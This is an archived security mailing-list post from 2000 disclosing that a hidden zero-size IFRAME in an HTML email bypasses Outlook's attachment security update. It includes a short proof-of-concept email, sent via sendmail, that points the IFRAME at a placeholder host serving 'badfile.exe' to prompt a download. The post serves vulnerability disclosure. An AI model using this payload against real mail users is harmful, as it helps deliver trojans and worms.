|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Subject: Circumventing Outlook Security Update File Download Security With IFRAMEs
From: cassius
HUSHMAIL.COMDate: Fri Jun 09 2000 - 17:33:33 CDT
- Next message: |[TDP]|: "Remote DoS for Mercur 3.2"
- Previous message: Nathan Neulinger: "Re: bind running as root in Mandrake 7.0"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
This is an update to my previous post on malicious URLs and Outlook.
You *can* circumvent the Outlook E-Mail Security Update with IFRAMEs.
Example:
% sendmail outlookuserexample.com
MIME-Version: 1.0
Content-Type: text/html
Subject: Fake Attachment
<html>
<iframe src='http://download.example.com/badfile.exe' height=0 width=0>
</html>"
>.
This will display an IE 'open/download' dialog if the message is viewed
in the preview pane or opened for reading.
So Outlook with the patch is still vulnerable to worms, virii and trojans.
IMPORTANT NOTICE: If you are not using HushMail, this message could have been read easily by the many people who have access to your open personal email messages.
Get your FREE, totally secure email address at http://www.hushmail.com.
- Next message: |[TDP]|: "Remote DoS for Mercur 3.2"
- Previous message: Nathan Neulinger: "Re: bind running as root in Mandrake 7.0"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]